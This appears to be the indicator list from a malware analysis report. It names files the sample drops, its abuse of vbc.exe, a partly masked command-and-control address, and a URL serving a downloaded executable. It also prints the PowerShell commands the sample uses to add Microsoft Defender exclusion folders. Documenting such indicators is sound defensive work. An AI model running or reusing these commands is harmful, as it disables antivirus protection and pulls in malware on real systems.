Technical Information
- %WINDIR%\microsoft.net\framework\v4.0.30319\vbc.exe
- %ALLUSERSPROFILE%\hostdata\logs.uce
- %TEMP%\logs.uce
- C:\logs.uce
- %ALLUSERSPROFILE%\hostdata\logs.uce
- '19#.#06.191.16':7766
- http://19#.##6.191.16:7766/Task29Watch.exe via 19#.#06.191.16
- '%WINDIR%\microsoft.net\framework\v4.0.30319\vbc.exe'
- '%WINDIR%\syswow64\cmd.exe' /C chcp 1251 & powershell -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop" & powershell -Command Add-MpPreference -ExclusionPath "%ALLUSERSPROFILE%\Dllhost" & powershell -Com...
- '%WINDIR%\syswow64\chcp.com' 1251
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionPath "%ALLUSERSPROFILE%\Dllhost"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionPath "%ALLUSERSPROFILE%\HostData"